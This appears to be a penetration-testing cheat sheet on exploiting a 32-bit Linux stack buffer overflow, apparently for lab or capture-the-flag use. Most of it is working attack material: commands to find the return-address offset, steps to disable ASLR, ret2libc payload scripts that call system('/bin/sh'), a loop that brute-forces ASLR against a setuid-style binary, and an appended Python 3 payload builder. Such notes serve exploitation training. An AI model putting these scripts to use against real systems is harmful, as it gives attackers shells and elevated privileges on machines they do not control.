Buffer Overflow

Test Overflow

Feed an oversized argument. A segmentation fault means the input overran the buffer and most likely clobbered the saved return address; confirm it in gdb below.

./binary `python -c 'print "A"*500'`   # Python 2 print statement, as in the rest of these notes

Open binary with gdb

First install Python Exploit Development Assistance for GDB.

git clone https://github.com/longld/peda.git ~/peda
echo "source ~/peda/peda.py" >> ~/.gdbinit
gdb ./binary
gdb# b main
gdb# r

Identify if host has ASLR

ASLR randomises the load address of libc (and of the stack and heap) on every run, so a libc address that differs between runs means ASLR is on.

ldd binary | grep libc   # run several times; a changing libc address means ASLR is on
cat /proc/sys/kernel/randomize_va_space   # 0 = off, 1 = stack/mmap/vdso randomised, 2 = heap (brk) as well

Disable ASLR

Needs root, applies system-wide and does not survive a reboot.

echo 0 > /proc/sys/kernel/randomize_va_space

Create patterns

Create a pattern that never repeats (no 4-byte window occurs twice), so the bytes that land in EIP identify their position in the input.

locate pattern_   # pattern_create.rb and pattern_offset.rb ship with Metasploit
pattern_create.rb -l 200

Pass argument to binary

gdb ./binary
gdb# r $(pattern_create.rb -l 200)   # gdb's run passes the argument through the shell; paste the pattern instead if the script is not on PATH

Copy memory address of the crash

The value in EIP at the crash (PEDA prints it in the register dump) is four bytes of the pattern, loaded little-endian:

pattern_offset.rb -q 0x64413764   # the EIP value; 0x64413764 is the bytes "d7Ad" of the pattern
Found match at offset 112   # 112 bytes of input sit before the saved return address

Start buffer overflow script

import struct

buf = "A" * 112                        # padding up to the saved return address (offset from pattern_offset.rb)
buf += struct.pack("<I", 0xd3adc0d3)   # placeholder return address, packed as 32-bit little-endian

print buf   # Python 2; the printed bytes become the binary's argument

gdb ./binary
gdb# r $(python buff.py)   # command substitution, not quotes, so the payload bytes are passed as the argument

The crash should now show EIP = 0xd3adc0d3, which confirms control of the return address.

Find important addresses

On the victim machine

ldd ovrfl | grep libc   # the address in parentheses is the libc base
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep -i system   # offset of system@@GLIBC, relative to the libc base
readelf -s /lib/i386-linux-gnu/libc.so.6 | grep -i exit   # offset of exit@@GLIBC
strings -atx /lib/i386-linux-gnu/libc.so.6 | grep bin/sh   # -t x prints the offset of the "/bin/sh" string in hex

Add each offset to the libc base to get the runtime address.

Or using gdb in a similar VM. Even with ASLR on, gdb disables it for the program it runs (set disable-randomization off re-enables it), so the values below are the no-ASLR addresses: they match the target only when ASLR is off there; otherwise subtract the libc base to turn them into offsets.

#include <stdlib.h>

int main(void) {
    system("/bin/sh");
    return 0;
}

gcc retlib.c -o retlib   # add -m32 on a 64-bit host when the target is 32-bit
gdb ./retlib
gdb# b main
gdb# r   # libc must be loaded before its symbols resolve
gdb# p system   # get system address
gdb# p exit   # get exit address
gdb# searchmem /bin/sh   # PEDA command; get /bin/sh address
gdb# find 0xf7e0c980, +9999999, "/bin/sh"   # plain gdb equivalent; search forward from the libc base

Additions to script

import struct

# placeholders: replace with the addresses found above
system_addr = struct.pack("<I", 0x88482f8)    # address of system()
exit_addr = struct.pack("<I", 0xd3adc0d3)     # where system() returns to; exit() gives a clean exit instead of a crash
arg_addr = struct.pack("<I", 0x88482f8)       # address of the "/bin/sh" string, system()'s argument

buf = "A" * 112
buf += system_addr   # overwrites the saved return address
buf += exit_addr     # popped by system() as its own return address
buf += arg_addr      # read by system() as its first argument

print buf
gdb# r $(python buff.py)

Argument strings end at the first NUL byte, so an address containing 0x00 cuts the payload short; pick another address (or delivery route) if that happens.

Bruteforce ASLR

On 32-bit Linux the libc base has limited entropy, so record one libc address seen on the target (from ldd, with ASLR on) and rerun the exploit until the loader picks that same base again.

from subprocess import call
import struct

# placeholders: one libc base seen on the target, and the offsets from readelf/strings
libc_base_addr = 0x88482f8

system_off = 0xd3adc0d3
exit_off = 0xd3adc0d3
arg_sh = 0xd3adc0d3

system_addr = struct.pack("<I", libc_base_addr + system_off)
exit_addr = struct.pack("<I", libc_base_addr + exit_off)
arg_addr = struct.pack("<I", libc_base_addr + arg_sh)

buf = "A" * 112
buf += system_addr
buf += exit_addr
buf += arg_addr

# Run the target until ASLR lands on the recorded base. A bad guess dies with
# a signal (call returns a negative code, -11 for SIGSEGV); a normal exit means
# system() ran and the shell was closed.
i = 0
while i < 512:
    print "Try: %s" % i
    i += 1
    ret = call(["/usr/local/bin/ovrflw", buf])
    if ret >= 0:
        break

If ASLR is off, drop the loop, print buf at the end instead, and pass it on the command line:

./binary "$(python /dev/shm/exploit.py)"
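As an added worked example (not part of the original notes), the Python 3 script below reimplements what the sections above do with pattern_create.rb, pattern_offset.rb and the Python 2 exploit fragments: it builds the Metasploit-style cyclic pattern, maps the EIP value 0x64413764 back to offset 112, turns readelf/strings offsets into addresses for a given libc base, and lays out the 32-bit ret2libc frame, refusing a payload that contains a NUL byte since argv cannot carry one. The libc base and offsets in the main block are constructed placeholders, not values from any real system.

```python
import struct
import sys
from string import ascii_uppercase, ascii_lowercase, digits

# Metasploit's pattern is every (upper, lower, digit) triplet in order: Aa0Aa1...Zz9.
MAX_PATTERN_LEN = len(ascii_uppercase) * len(ascii_lowercase) * len(digits) * 3  # 20280


def pattern_create(length):
    """Same output as pattern_create.rb -l <length>: a byte string in which no
    4-byte window repeats, so the bytes that land in EIP identify their offset."""
    if not 0 <= length <= MAX_PATTERN_LEN:
        raise ValueError("a pattern longer than %d bytes would repeat" % MAX_PATTERN_LEN)
    out = bytearray()
    for u in ascii_uppercase.encode():
        for l in ascii_lowercase.encode():
            for d in digits.encode():
                out += bytes((u, l, d))
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out)


def pattern_offset(crash_value, length=MAX_PATTERN_LEN):
    """Same answer as pattern_offset.rb -q <value>: the 32-bit value gdb shows in
    EIP was loaded little-endian, so 0x64413764 is the bytes b"d7Ad" in the pattern."""
    needle = struct.pack("<I", crash_value)
    idx = pattern_create(length).find(needle)
    if idx < 0:
        raise ValueError("EIP value not in the pattern: wrong endianness, or EIP was not fully overwritten")
    return idx


def rebase(libc_base, *offsets):
    """Turn readelf/strings offsets into runtime addresses for one libc base
    (the address in parentheses on the ldd line)."""
    return tuple(libc_base + off for off in offsets)


def build_ret2libc(offset, system_addr, exit_addr, binsh_addr, filler=b"A"):
    """32-bit ret2libc frame. Stack after the overflow, lowest address first:
      [filler * offset][system][exit][&"/bin/sh"]
    The saved EIP is replaced by system; when system returns it pops exit as its
    return address, and it reads its single argument from the slot after that."""
    frame = struct.pack("<III", system_addr, exit_addr, binsh_addr)
    payload = filler * offset + frame
    # argv entries are C strings: a NUL byte anywhere ends the payload early.
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL byte and cannot be delivered via argv")
    return payload


if __name__ == "__main__":
    # Constructed values for illustration only: offset 112 as on this page; the
    # base and offsets are assumptions to be replaced with the target's own
    # ldd/readelf/strings (or gdb) output.
    libc_base = 0xf7e00000
    system_addr, exit_addr, binsh_addr = rebase(libc_base, 0x3ada0, 0x2e9d0, 0x15ea0b)
    payload = build_ret2libc(112, system_addr, exit_addr, binsh_addr)
    # Emit raw bytes so the shell can pass them on: ./binary "$(python3 exploit.py)"
    sys.stdout.buffer.write(payload)
```

Quote the command substitution when passing the output (`./binary "$(python3 exploit.py)"`) so the shell does not word-split the payload bytes; for the brute-force case, call build_ret2libc once and hand the same payload to subprocess in a loop as the Python 2 script above does.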